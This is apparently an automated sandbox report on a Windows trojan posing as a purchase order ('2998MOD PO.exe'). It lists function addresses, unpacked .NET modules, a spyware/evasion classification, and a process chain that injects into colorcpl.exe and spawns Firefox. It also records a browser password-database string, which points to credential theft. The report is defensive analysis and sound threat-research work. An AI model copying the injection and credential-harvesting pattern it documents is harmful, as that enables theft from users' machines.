                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_05642E400_2_05642E40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_05642E300_2_05642E30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056413600_2_05641360
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 0_2_056413500_2_05641350
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004183D34_2_004183D3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004011104_2_00401110
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040E13B4_2_0040E13B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0042EAD34_2_0042EAD3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004023704_2_00402370
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040FCC34_2_0040FCC3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004166134_2_00416613
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040FEE34_2_0040FEE3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0040DF634_2_0040DF63
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_004027104_2_00402710
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00402FD04_2_00402FD0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A441A24_2_01A441A2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A501AA4_2_01A501AA
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A481CC4_2_01A481CC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019801004_2_01980100
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2A1184_2_01A2A118
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A181584_2_01A18158
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A220004_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A503E64_2_01A503E6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E3F04_2_0199E3F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4A3524_2_01A4A352
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A102C04_2_01A102C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A302744_2_01A30274
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A505914_2_01A50591
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019905354_2_01990535
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3E4F64_2_01A3E4F6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A344204_2_01A34420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A424464_2_01A42446
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198C7C04_2_0198C7C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B47504_2_019B4750
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019907704_2_01990770
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AC6E04_2_019AC6E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A5A9A64_2_01A5A9A6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019929A04_2_019929A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A69624_2_019A6962
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019768B84_2_019768B8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE8F04_2_019BE8F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199A8404_2_0199A840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019928404_2_01992840
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A46BD74_2_01A46BD7
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4AB404_2_01A4AB40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198EA804_2_0198EA80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A8DBF4_2_019A8DBF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198ADE04_2_0198ADE0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199AD004_2_0199AD00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2CD1F4_2_01A2CD1F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A30CB54_2_01A30CB5
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980CF24_2_01980CF2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990C004_2_01990C00
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0EFA04_2_01A0EFA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01982FC84_2_01982FC8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A32F304_2_01A32F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0F304_2_019B0F30
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D2F284_2_019D2F28
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A04F404_2_01A04F40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A2E904_2_019A2E90
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4CE934_2_01A4CE93
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4EEDB4_2_01A4EEDB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4EE264_2_01A4EE26
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01990E594_2_01990E59
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199B1B04_2_0199B1B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A5B16B4_2_01A5B16B
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197F1724_2_0197F172
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C516C4_2_019C516C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F0E04_2_01A4F0E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A470E94_2_01A470E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019970C04_2_019970C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3F0CC4_2_01A3F0CC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D739A4_2_019D739A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4132D4_2_01A4132D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197D34C4_2_0197D34C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019952A04_2_019952A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A312ED4_2_01A312ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AB2C04_2_019AB2C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AD2F04_2_019AD2F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2D5B04_2_01A2D5B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A475714_2_01A47571
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F43F4_2_01A4F43F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019814604_2_01981460
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4F7B04_2_01A4F7B0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A416CC4_2_01A416CC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D56304_2_019D5630
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A259104_2_01A25910
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019999504_2_01999950
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AB9504_2_019AB950
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019938E04_2_019938E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FD8004_2_019FD800
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AFB804_2_019AFB80
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A05BF04_2_01A05BF0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019CDBF94_2_019CDBF9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FB764_2_01A4FB76
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A31AA34_2_01A31AA3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2DAAC4_2_01A2DAAC
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019D5AA04_2_019D5AA0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3DAC64_2_01A3DAC6
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A03A6C4_2_01A03A6C
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A47A464_2_01A47A46
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FA494_2_01A4FA49
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AFDC04_2_019AFDC0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A47D734_2_01A47D73
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01993D404_2_01993D40
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A41D5A4_2_01A41D5A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FCF24_2_01A4FCF2
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A09C324_2_01A09C32
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01991F924_2_01991F92
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FFB14_2_01A4FFB1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A4FF094_2_01A4FF09
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01999EB04_2_01999EB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D6E4F68_2_04D6E4F6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D724468_2_04D72446
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D644208_2_04D64420
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D805918_2_04D80591
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC05358_2_04CC0535
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDC6E08_2_04CDC6E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CBC7C08_2_04CBC7C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CE47508_2_04CE4750
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC07708_2_04CC0770
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D520008_2_04D52000
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D781CC8_2_04D781CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D801AA8_2_04D801AA
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D741A28_2_04D741A2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D481588_2_04D48158
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CB01008_2_04CB0100
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D5A1188_2_04D5A118
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D402C08_2_04D402C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D602748_2_04D60274
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CCE3F08_2_04CCE3F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D803E68_2_04D803E6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7A3528_2_04D7A352
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CB0CF28_2_04CB0CF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D60CB58_2_04D60CB5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC0C008_2_04CC0C00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CBADE08_2_04CBADE0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CD8DBF8_2_04CD8DBF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D5CD1F8_2_04D5CD1F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CCAD008_2_04CCAD00
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7EEDB8_2_04D7EEDB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7CE938_2_04D7CE93
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CD2E908_2_04CD2E90
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC0E598_2_04CC0E59
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7EE268_2_04D7EE26
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CB2FC88_2_04CB2FC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D3EFA08_2_04D3EFA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D34F408_2_04D34F40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D62F308_2_04D62F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D02F288_2_04D02F28
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CE0F308_2_04CE0F30
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CEE8F08_2_04CEE8F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CA68B88_2_04CA68B8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CCA8408_2_04CCA840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC28408_2_04CC2840
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC29A08_2_04CC29A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D8A9A68_2_04D8A9A6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CD69628_2_04CD6962
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CBEA808_2_04CBEA80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D76BD78_2_04D76BD7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7AB408_2_04D7AB40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CB14608_2_04CB1460
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7F43F8_2_04D7F43F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D895C38_2_04D895C3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D5D5B08_2_04D5D5B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D775718_2_04D77571
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D716CC8_2_04D716CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D056308_2_04D05630
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7F7B08_2_04D7F7B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC70C08_2_04CC70C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D6F0CC8_2_04D6F0CC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7F0E08_2_04D7F0E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D770E98_2_04D770E9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CCB1B08_2_04CCB1B0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CF516C8_2_04CF516C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D8B16B8_2_04D8B16B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CAF1728_2_04CAF172
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDB2C08_2_04CDB2C0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D612ED8_2_04D612ED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDD2F08_2_04CDD2F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC52A08_2_04CC52A0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D0739A8_2_04D0739A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CAD34C8_2_04CAD34C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7132D8_2_04D7132D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7FCF28_2_04D7FCF2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D39C328_2_04D39C32
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDFDC08_2_04CDFDC0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC3D408_2_04CC3D40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D71D5A8_2_04D71D5A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D77D738_2_04D77D73
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC9EB08_2_04CC9EB0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C83FD28_2_04C83FD2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04C83FD58_2_04C83FD5
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC1F928_2_04CC1F92
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7FFB18_2_04D7FFB1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7FF098_2_04D7FF09
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC38E08_2_04CC38E0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D2D8008_2_04D2D800
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CC99508_2_04CC9950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDB9508_2_04CDB950
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D559108_2_04D55910
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D6DAC68_2_04D6DAC6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D05AA08_2_04D05AA0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D61AA38_2_04D61AA3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D5DAAC8_2_04D5DAAC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D77A468_2_04D77A46
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7FA498_2_04D7FA49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D33A6C8_2_04D33A6C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D35BF08_2_04D35BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CFDBF98_2_04CFDBF9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04CDFB808_2_04CDFB80
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04D7FB768_2_04D7FB76
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4EF7E8_2_04B4EF7E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4E75C8_2_04B4E75C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4E2A48_2_04B4E2A4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4E3C68_2_04B4E3C6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04B4D8288_2_04B4D828
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: String function: 0197B970 appears 262 times
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: String function: 019FEA12 appears 86 times
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: String function: 019C5130 appears 58 times
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: String function: 01A0F290 appears 103 times
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: String function: 019D7E54 appears 99 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04CF5130 appears 58 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04CAB970 appears 262 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04D07E54 appears 107 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04D3F290 appears 103 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04D2EA12 appears 86 times
                Source: 2998MOD PO.exe, 00000000.00000002.1876830848.000000000B5A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000000.00000000.1704754563.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSWBp.exeF vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000000.00000002.1861503868.0000000000C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000004.00000002.2041370277.0000000001A7D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2998MOD PO.exe
                Source: 2998MOD PO.exe, 00000004.00000002.2040956683.00000000014F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs 2998MOD PO.exe
                Source: 2998MOD PO.exeBinary or memory string: OriginalFilenameSWBp.exeF vs 2998MOD PO.exe
                Source: 2998MOD PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2998MOD PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, GuVZeiWWGgyIsVPOZB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, GuVZeiWWGgyIsVPOZB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, GuVZeiWWGgyIsVPOZB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, hxQAyEPkVUnir0mqK7.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@1/1
                Source: C:\Users\user\Desktop\2998MOD PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2998MOD PO.exe.logJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\colorcpl.exeFile created: C:\Users\user\AppData\Local\Temp\Ea64OHKqJump to behavior
                Source: 2998MOD PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 2998MOD PO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\2998MOD PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2222639581.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2222496095.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 2998MOD PO.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess created: C:\Users\user\Desktop\2998MOD PO.exe "C:\Users\user\Desktop\2998MOD PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
